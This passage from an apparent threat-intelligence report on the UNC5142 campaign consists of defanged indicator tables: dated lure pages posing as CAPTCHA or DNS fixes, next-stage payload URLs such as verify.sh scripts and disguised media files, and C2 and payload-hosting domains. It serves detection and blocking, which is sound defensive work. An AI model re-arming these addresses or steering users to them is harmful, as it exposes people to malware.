<tr>
<td>
<p><span>2025-04-24</span></p>
</td>
<td>
<p><span>hXXps://know-knock-who-is-here[.]pages[.]dev/</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2025-04-23</span></p>
</td>
<td>
<p><span>hXXps://ndgadfqwywqe[.]pages[.]dev/win</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2025-04-23</span></p>
</td>
<td>
<p><span>hXXps://jjiiiiiiiiijjjj[.]pages[.]dev/</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2025-04-22</span></p>
</td>
<td>
<p><span>hXXps://gthfjdk[.]pages[.]dev/</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2025-04-22</span></p>
</td>
<td>
<p><span>hXXps://ffmqitnka[.]pages[.]dev/</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2025-04-21</span></p>
</td>
<td>
<p><span>hXXps://jrtersdfg[.]pages[.]dev/</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2025-04-20</span></p>
</td>
<td>
<p><span>hXXps://rhfvjck[.]pages[.]dev/</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2025-04-20</span></p>
</td>
<td>
<p><span>hXXps://tracklist22[.]pages[.]dev/</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2025-04-20</span></p>
</td>
<td>
<p><span>hXXps://tracklist22[.]pages[.]dev/</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2025-04-20</span></p>
</td>
<td>
<p><span>hXXps://sound-designer-v21[.]pages[.]dev/</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2025-04-19</span></p>
</td>
<td>
<p><span>hXXps://rivertracker[.]pages[.]dev/</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2025-04-16</span></p>
</td>
<td>
<p><span>hXXps://bootstrappa[.]pages[.]dev/</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2025-04-16</span></p>
</td>
<td>
<p><span>hXXps://renovateai[.]pages[.]dev/</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2025-04-05</span></p>
</td>
<td>
<p><span>hXXps://nhgfdc-ok[.]pages[.]dev/</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2025-04-05</span></p>
</td>
<td>
<p><span>hXXps://yt3cvkj43ws[.]pages[.]dev/</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2025-04-04</span></p>
</td>
<td>
<p><span>hXXps://rose-pole-chip[.]pages[.]dev/</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2025-04-03</span></p>
</td>
<td>
<p><span>hXXps://0-000-0[.]pages[.]dev/</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2025-04-02</span></p>
</td>
<td>
<p><span>hXXps://000-0-000[.]pages[.]dev/</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2025-04-02</span></p>
</td>
<td>
<p><span>hXXps://xxx-xx-x-xxx[.]pages[.]dev/</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2025-03-18</span></p>
</td>
<td>
<p><span>hXXps://ooooi1[.]pages[.]dev/kop</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2025-03-18</span></p>
</td>
<td>
<p><span>hXXps://helloworld-f1f[.]pages[.]dev/penguin</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2025-03-16</span></p>
</td>
<td>
<p><span>hXXps://hfdjb[.]pages[.]dev/start</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2025-03-13</span></p>
</td>
<td>
<p><span>hXXps://sunlight-11[.]pages[.]dev/a</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2025-03-12</span></p>
</td>
<td>
<p><span>hXXps://bbb1-9we[.]pages[.]dev/mountain</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2025-03-12</span></p>
</td>
<td>
<p><span>hXXps://jsfiles-bqq[.]pages[.]dev/1</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2025-03-11</span></p>
</td>
<td>
<p><span>hXXps://mixg-u[.]pages[.]dev/page_d</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2025-03-07</span></p>
</td>
<td>
<p><span>hXXps://kolobsgw[.]pages[.]dev/</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2025-03-06</span></p>
</td>
<td>
<p><span>hXXps://nn11[.]pages[.]dev/</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2025-03-05</span></p>
</td>
<td>
<p><span>hXXps://nnoq[.]pages[.]dev/</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2025-03-05</span></p>
</td>
<td>
<p><span>hXXps://fmoz[.]pages[.]dev/</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2025-03-05</span></p>
</td>
<td>
<p><span>hXXps://x1x1[.]pages[.]dev/native1E</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2025-03-05</span></p>
</td>
<td>
<p><span>hXXps://fwfa[.]pages[.]dev/kioto</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2025-03-04</span></p>
</td>
<td>
<p><span>hXXps://fhjwekn[.]pages[.]dev/ibn</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2025-03-04</span></p>
</td>
<td>
<p><span>hXXps://dsk1a[.]pages[.]dev/onside</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2025-03-02</span></p>
</td>
<td>
<p><span>hXXps://f23-11r[.]pages[.]dev/verse</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2025-03-02</span></p>
</td>
<td>
<p><span>hXXps://dfhusj[.]pages[.]dev/train</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2025-03-01</span></p>
</td>
<td>
<p><span>hXXps://bsdw[.]pages[.]dev/blink</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2025-02-28</span></p>
</td>
<td>
<p><span>hXXps://hypo-dance[.]pages[.]dev/damn</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2025-02-26</span></p>
</td>
<td>
<p><span>hXXps://ert67-o9[.]pages[.]dev/data</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2025-02-26</span></p>
</td>
<td>
<p><span>hXXps://f003[.]backblazeb2[.]com/file/skippp/uu[.]html</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2025-02-26</span></p>
</td>
<td>
<p><span>hXXps://f003[.]backblazeb2[.]com/file/skippp/index[.]html</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2025-02-25</span></p>
</td>
<td>
<p><span>hXXps://hostme[.]pages[.]dev/host</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2025-02-25</span></p>
</td>
<td>
<p><span>hXXps://ghost-name[.]pages[.]dev/website</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2025-02-24</span></p>
</td>
<td>
<p><span>hXXps://gdfg-23rwe[.]pages[.]dev/index[.]html</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2025-02-21</span></p>
</td>
<td>
<p><span>hXXps://sha-11x[.]pages[.]dev/</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2025-02-20</span></p>
</td>
<td>
<p><span>hXXps://b1-c1-k8[.]pages[.]dev/</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2025-02-20</span></p>
</td>
<td>
<p><span>hXXps://1a-a1[.]pages[.]dev/</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2025-02-20</span></p>
</td>
<td>
<p><span>hXXps://sdfwefwg[.]pages[.]dev/</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2025-02-19</span></p>
</td>
<td>
<p><span>hXXps://niopg[.]pages[.]dev/</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2025-02-19</span></p>
</td>
<td>
<p><span>hXXps://sdfwefwg[.]pages[.]dev/</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2025-02-18</span></p>
</td>
<td>
<p><span>hXXps://cleaning-devices-k[.]pages[.]dev/</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2025-02-16</span></p>
</td>
<td>
<p><span>hXXps://tour-agency-media[.]pages[.]dev/</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2025-02-16</span></p>
</td>
<td>
<p><span>hXXps://fresh-orange-juice[.]pages[.]dev/</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2025-02-16</span></p>
</td>
<td>
<p><span>hXXps://you-insk-bad[.]pages[.]dev/</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2025-02-11</span></p>
</td>
<td>
<p><span>hXXps://human-verify-7u[.]pages[.]dev/</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2025-02-10</span></p>
</td>
<td>
<p><span>hXXps://recaptcha-verify-me-1c[.]pages[.]dev/</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2025-02-07</span></p>
</td>
<td>
<p><span>hXXps://macos-browser-update-9n[.]pages[.]dev/</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2025-02-07</span></p>
</td>
<td>
<p><span>hXXps://macos-browser-update-5i[.]pages[.]dev/</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2025-02-07</span></p>
</td>
<td>
<p><span>hXXps://macos-browser-update-5y[.]pages[.]dev/</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2025-02-07</span></p>
</td>
<td>
<p><span>hXXps://recaptcha-verify-2e[.]pages[.]dev/</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2025-02-07</span></p>
</td>
<td>
<p><span>hXXps://recaptcha-verify-7z[.]pages[.]dev/</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2025-02-07</span></p>
</td>
<td>
<p><span>hXXps://recaptcha-verify-1t[.]pages[.]dev/</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2025-02-04</span></p>
</td>
<td>
<p><span>hXXps://recaptcha-verify-9m[.]pages[.]dev/</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2025-02-02</span></p>
</td>
<td>
<p><span>hXXps://disable-data-collect-ai[.]pages[.]dev/</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2025-01-25</span></p>
</td>
<td>
<p><span>hXXps://recaptcha-verify-1r[.]pages[.]dev/</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2025-01-23</span></p>
</td>
<td>
<p><span>hXXps://recaptha-verify-5q[.]pages[.]dev/</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2025-01-22</span></p>
</td>
<td>
<p><span>hXXps://recaptha-verify-6l[.]pages[.]dev/</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2025-01-02</span></p>
</td>
<td>
<p><span>hXXps://recaptha-verify-1n[.]pages[.]dev/</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2024-12-31</span></p>
</td>
<td>
<p><span>hXXps://recaptha-verify-4z[.]pages[.]dev/</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2024-12-30</span></p>
</td>
<td>
<p><span>hXXps://recaptha-verify-7u[.]pages[.]dev/</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2024-12-28</span></p>
</td>
<td>
<p><span>hXXps://recaptha-verify-c1[.]pages[.]dev/</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2024-12-28</span></p>
</td>
<td>
<p><span>hXXps://recaptha-verify-3m[.]pages[.]dev/</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2024-12-27</span></p>
</td>
<td>
<p><span>hXXps://recaptha-verify-2w[.]pages[.]dev/</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2024-12-25</span></p>
</td>
<td>
<p><span>hXXps://recaptha-verify-q3[.]pages[.]dev/</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2024-12-23</span></p>
</td>
<td>
<p><span>hXXps://recaptcha-dns-o5[.]pages[.]dev/</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2024-12-21</span></p>
</td>
<td>
<p><span>hXXps://recaptcha-dns-d9[.]pages[.]dev/</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2024-12-20</span></p>
</td>
<td>
<p><span>hXXps://recaptha-verify-9o[.]pages[.]dev/</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2024-12-19</span></p>
</td>
<td>
<p><span>hXXps://recaptcha-0d-verify[.]pages[.]dev/</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2024-12-17</span></p>
</td>
<td>
<p><span>hXXps://recaptha-verify-7y[.]pages[.]dev/</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2024-12-15</span></p>
</td>
<td>
<p><span>hXXps://dns-resolver-es8[.]pages[.]dev/</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2024-12-14</span></p>
</td>
<td>
<p><span>hXXps://ip-provider[.]pages[.]dev/</span></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div></div>
<div class="block-paragraph_advanced"><div align="center">
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div><table border="1px" cellpadding="16px"><colgroup><col><col></colgroup>
<tbody>
<tr>
<td>
<p><strong>Date</strong></p>
</td>
<td>
<p><strong>Next Stage Payload URL</strong></p>
</td>
</tr>
<tr>
<td>
<p><span>2025-05-30</span></p>
</td>
<td>
<p><span>hXXps://kimbeech[.]cfd/cap/verify.sh</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2025-05-13</span></p>
</td>
<td>
<p><span>hXXps://entrinidad[.]cfd/1/verify.sh</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2025-05-11</span></p>
</td>
<td>
<p><span>hXXps://tofukai[.]cfd/2/verify.sh</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2025-05-08</span></p>
</td>
<td>
<p><span>hXXps://privatunis[.]cfd/1/verify.sh</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2025-05-05</span></p>
</td>
<td>
<p><span>hXXps://e[.]overallwobbly[.]ru/era-stc</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2025-05-01</span></p>
</td>
<td>
<p><span>hXXps://salorttactical[.]top/2/verify.sh</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2025-04-28</span></p>
</td>
<td>
<p><span>hXXps://security-2u6g-log[.]com/1/verify.sh</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2025-04-28</span></p>
</td>
<td>
<p><span>hXXps://lammysecurity[.]com/4/verify.sh</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2025-04-27</span></p>
</td>
<td>
<p><span>hXXps://security-7f2c-run[.]com/2/verify.sh</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2025-04-26</span></p>
</td>
<td>
<p><span>hXXps://security-9y5v-scan[.]com/3/verify.sh</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2025-04-25</span></p>
</td>
<td>
<p><span>hXXps://security-9y5v-scan[.]com/7/verify.sh</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2025-04-24</span></p>
</td>
<td>
<p><span>hXXps://security-a2k8-go[.]com/6/verify.sh</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2025-04-23</span></p>
</td>
<td>
<p><span>hXXps://security-check-l2j4[.]com/verify.sh</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2025-04-23</span></p>
</td>
<td>
<p><span>hXXps://security-2k7q-check[.]com/1/verify.sh</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2025-04-22</span></p>
</td>
<td>
<p><span>hXXps://security-check-u8a6[.]com/2/verify.sh</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2025-04-20</span></p>
</td>
<td>
<p><span>hXXps://betiv[.]fun/7456f63a46cc318334a70159aa3c4291[.]txt</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2025-04-16</span></p>
</td>
<td>
<p><span>hXXps://jdiazmemory[.]com/4/verify[.]sh</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2025-04-16</span></p>
</td>
<td>
<p><span>hXXps://fleebunga[.]sbs</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2025-04-05</span></p>
</td>
<td>
<p><span>hXXps://captcha-verify-6r4x[.]com/verify[.]sh</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2025-04-05</span></p>
</td>
<td>
<p><span>hXXp://power[.]moon-river-coin[.]xyz/</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2025-04-04</span></p>
</td>
<td>
<p><span>hXXp://run[.]fox-chair-dust[.]xyz/</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2025-04-03</span></p>
</td>
<td>
<p><span>hXXps://captcha-cdn[.]com/verify.sh</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2025-04-02</span></p>
</td>
<td>
<p><span>hXXp://bridge[.]tree-sock-rain[.]today/</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2025-03-29</span></p>
</td>
<td>
<p><span>hXXp://ok[.]fish-cloud-jar[.]us/</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2025-03-18</span></p>
</td>
<td>
<p><span>hXXp://message[.]zoo-ciry[.]shop/</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2025-03-16</span></p>
</td>
<td>
<p><span>hXXp://text[.]cherry-pink[.]shop</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2025-03-13</span></p>
</td>
<td>
<p><span>hXXp://sandbox[.]silver-map-generator[.]shop/</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2025-03-12</span></p>
</td>
<td>
<p><span>hXXp://items[.]kycc-camera[.]shop/</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2025-03-11</span></p>
</td>
<td>
<p><span>hXXp://def[.]ball-strike-up[.]shop/</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2025-03-07</span></p>
</td>
<td>
<p><span>hXXp://incognito[.]uploads[.]it[.]com</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2025-03-07</span></p>
</td>
<td>
<p><span>hXXps://bytes[.]microstorage[.]shop/</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2025-03-05</span></p>
</td>
<td>
<p><span>hXXps://black[.]hologramm[.]us/</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2025-03-04</span></p>
</td>
<td>
<p><span>hXXps://xxx[.]retweet[.]shop/</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2025-03-02</span></p>
</td>
<td>
<p><span>hXXps://butanse[.]shop/</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2025-03-01</span></p>
</td>
<td>
<p><span>hXXps://rengular11[.]today/</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2025-02-28</span></p>
</td>
<td>
<p><span>hXXps://lumichain[.]pro/</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2025-02-27</span></p>
</td>
<td>
<p><span>hXXps://www[.]mediafire[.]com/file_premium/d6r4c3nzfv9mgl7/glass.mp3/file</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2025-02-26</span></p>
</td>
<td>
<p><span>hXXps://www[.]mediafire[.]com/file_premium/8q094mjevfshw6g/glass.mp3/file</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2025-02-26</span></p>
</td>
<td>
<p><span>hXXps://tumbl[.]design-x[.]xyz/glass.mp3</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2025-02-25</span></p>
</td>
<td>
<p><span>hXXps://sandbox[.]yunqof[.]shop/macan.mp3</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2025-02-25</span></p>
</td>
<td>
<p><span>hXXps://block[.]a-1-a1a[.]shop/drive.mp3</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2025-02-24</span></p>
</td>
<td>
<p><span>hXXps://note1[.]nz7bn[.]pro/nnp.mp4</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2025-02-22</span></p>
</td>
<td>
<p><span>hXXps://ai[.]fdswgw[.]shop/one.mp4</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2025-02-21</span></p>
</td>
<td>
<p><span>hXXps://mnjk-jk[.]bsdfg-zmp-q-n[.]shop/1.mp4</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2025-02-20</span></p>
</td>
<td>
<p><span>hXXps://nbhg-v[.]iuksdfb-f[.]shop/ajax.mp3</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2025-02-20</span></p>
</td>
<td>
<p><span>hXXps://hur[.]bweqlkjr[.]shop/m41.mp4</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2025-02-19</span></p>
</td>
<td>
<p><span>hXXps://hur[.]bweqlkjr[.]shop/1a.m4a</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2025-02-19</span></p>
</td>
<td>
<p><span>hXXps://yob[.]yrwebsdf[.]shop/1a.m4a</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2025-02-19</span></p>
</td>
<td>
<p><span>hXXps://yob[.]yrwebsdf[.]shop/3t.mp4</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2025-02-18</span></p>
</td>
<td>
<p><span>hXXps://start[.]cleaning-room-device[.]shop/sha589.m4a</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2025-02-18</span></p>
</td>
<td>
<p><span>hXXps://discover-travel-agency[.]pro/joke[.]m4a</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2025-02-18</span></p>
</td>
<td>
<p><span>hXXps://discover-travel-agency[.]pro/walking[.]mp3</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2025-02-17</span></p>
</td>
<td>
<p><span>hXXps://discover-travel-agency[.]pro/1[.]m4a</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2025-02-16</span></p>
</td>
<td>
<p><span>hXXps://travel[.]image-gene-saver[.]it[.]com/1[.]m4a</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2025-02-16</span></p>
</td>
<td>
<p><span>hXXps://ads[.]green-pickle-jo[.]shop/1.m4a</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2025-02-13</span></p>
</td>
<td>
<p><span>hXXps://recaptcha-verify-4h[.]pro/kangarooing.m4a</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2025-02-13</span></p>
</td>
<td>
<p><span>hXXps://recaptcha-manual[.]shop/kangarooing.m4a</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2025-02-11</span></p>
</td>
<td>
<p><span>hXXps://recaptcha-verify-4h[.]pro/xfiles/kangarooing[.]vsdx</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2025-02-11</span></p>
</td>
<td>
<p><span>hXXps://recaptcha-verify-4h[.]pro/xfiles/verify.mp4</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2025-02-10</span></p>
</td>
<td>
<p><span>hXXps://human-verify[.]shop/xfiles/verify.mp4</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2025-02-10</span></p>
</td>
<td>
<p><span>hXXps://human-verify-4r[.]pro/xfiles/verify.mp4</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2025-02-10</span></p>
</td>
<td>
<p><span>hXXps://human-verify-4r[.]pro/xfiles/human[.]cpp</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2025-02-08</span></p>
</td>
<td>
<p><span>hXXps://dns-verify-me[.]pro/xfiles/train.mp4</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2025-02-06</span></p>
</td>
<td>
<p><span>hXXp://83[.]217[.]208[.]130/xfiles/Ohio.mp4</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2025-02-06</span></p>
</td>
<td>
<p><span>hXXp://83[.]217[.]208[.]130/xfiles/VIDA.mp3</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2025-02-06</span></p>
</td>
<td>
<p><span>hXXp://83[.]217[.]208[.]130/xfiles/VIDA.mp4</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2025-02-05</span></p>
</td>
<td>
<p><span>hXXp://83[.]217[.]208[.]130/xfiles/trip.mp4</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2025-02-05</span></p>
</td>
<td>
<p><span>hXXp://83[.]217[.]208[.]130/xfiles/trip[.]psd</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2025-02-05</span></p>
</td>
<td>
<p><span>hXXp://80[.]64[.]30[.]238/trip[.]psd</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2025-02-03</span></p>
</td>
<td>
<p><span>hXXp://80[.]64[.]30[.]238/evix.xll</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2025-02-03</span></p>
</td>
<td>
<p><span>hXXps://raw[.]githubusercontent[.]com/fuad686337/tyu/refs/heads/main/BEGIMOT.xll</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2025-02-02</span></p>
</td>
<td>
<p><span>hXXps://disable-data-ai-agent[.]pages[.]dev</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2025-01-23</span></p>
</td>
<td>
<p><span>hXXps://microsoft-dns-reload-5q[.]pages[.]dev</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2025-01-22</span></p>
</td>
<td>
<p><span>hXXps://microsoft-dns-reload-6l[.]pages[.]dev</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2025-01-02</span></p>
</td>
<td>
<p><span>hXXps://microsoft-dns-reload-1n[.]pages[.]dev</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2024-12-31</span></p>
</td>
<td>
<p><span>hXXps://microsoft-dns-reload-5m[.]pages[.]dev</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2024-12-30</span></p>
</td>
<td>
<p><span>hXXps://microsoft-dns-reload-7m[.]pages[.]dev</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2024-12-28</span></p>
</td>
<td>
<p><span>hXXps://microsoft-dns-reload-9q[.]pages[.]dev</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2024-12-28</span></p>
</td>
<td>
<p><span>hXXps://microsoft-dns-reload-3h[.]pages[.]dev</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2024-12-27</span></p>
</td>
<td>
<p><span>hXXps://microsoft-dns-reload-4r[.]pages[.]dev</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2024-12-25</span></p>
</td>
<td>
<p><span>hXXps://recaptcha-dns-b4[.]pages[.]dev</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2024-12-23</span></p>
</td>
<td>
<p><span>hXXps://restart-dns-service-u2[.]pages[.]dev</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2024-12-21</span></p>
</td>
<td>
<p><span>hXXps://recaptha-verify-8u[.]pages[.]dev</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2024-12-20</span></p>
</td>
<td>
<p><span>hXXps://microsoft-dns-reload-6y[.]pages[.]dev</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2024-12-19</span></p>
</td>
<td>
<p><span>hXXps://microsoft-dns-reload[.]pages[.]dev</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2024-12-17</span></p>
</td>
<td>
<p><span>hXXps://dnserror-cdw[.]pages[.]dev/</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2024-12-15</span></p>
</td>
<td>
<p><span>hXXps://dns-me[.]pages[.]dev/</span></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div></div>
<div class="block-paragraph_advanced"><div align="center">
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div><table border="1px" cellpadding="16px"><colgroup><col><col></colgroup>
<tbody>
<tr>
<td>
<p><strong>Indicator</strong></p>
</td>
<td>
<p><strong>Description</strong></p>
</td>
</tr>
<tr>
<td>
<p><span>saaadnesss[.]shop</span></p>
</td>
<td>
<p><span>UNC5142 C2 Check-in</span></p>
</td>
</tr>
<tr>
<td>
<p><span>lapkimeow[.]icu</span></p>
</td>
<td>
<p><span>UNC5142 C2 Check-in</span></p>
</td>
</tr>
<tr>
<td>
<p><span>ratatui[.]today</span></p>
</td>
<td>
<p><span>UNC5142 CLEARSHORT C2 Check-in</span></p>
</td>
</tr>
<tr>
<td>
<p><span>technavix[.]cloud</span></p>
</td>
<td>
<p><span>UNC5142 CLEARSHORT C2 Check-in</span></p>
</td>
</tr>
<tr>
<td>
<p><span>orange-service[.]xyz</span></p>
</td>
<td>
<p><span>UNC5142 CLEARSHORT C2 Check-in</span></p>
</td>
</tr>
<tr>
<td>
<p><span>hfdjmoedkjf[.]asia</span></p>
</td>
<td>
<p><span>UNC5142 CLEARSHORT C2 Check-in</span></p>
</td>
</tr>
<tr>
<td>
<p><span>polovoiinspektor[.]shop</span></p>
</td>
<td>
<p><span>UNC5142 Payload Hosting</span></p>
</td>
</tr>
<tr>
<td>
<p><span>googleapis-n-cdn3s-server[.]willingcapablepatronage[.]shop</span></p>
</td>
<td>
<p><span>UNC5142 Payload Hosting</span></p>
</td>
</tr>
<tr>
<td>
<p><span>rbk[.]scalingposturestrife[.]shop</span></p>
</td>
<td>
<p><span>UNC5142 Payload Hosting</span></p>
</td>
</tr>
<tr>
<td>
<p><span>ty[.]klipxytozyi[.]shop</span></p>
</td>
<td>
<p><span>UNC5142 Payload Hosting</span></p>
</td>
</tr>
<tr>
<td>
<p><span>discover-travel-agency[.]pro</span></p>
</td>
<td>
<p><span>UNC5142 Payload Hosting</span></p>
</td>
</tr>
<tr>
<td>
<p><span>browser-storage[.]com</span></p>
</td>
<td>
<p><span>UNC5142 Payload Hosting</span></p>
</td>
</tr>
<tr>
<td>
<p><span>kangla[.]klipxytozyi[.]shop</span></p>
</td>
<td>
<p><span>UNC5142 Payload Hosting</span></p>
</td>
</tr>
<tr>
<td>
<p><span>recaptcha-manual[.]shop</span></p>
</td>
<td>
<p><span>UNC5142 Payload Hosting</span></p>
</td>
</tr>
<tr>
<td>
<p><span>xxx[.]retweet[.]shop</span></p>
</td>
<td>
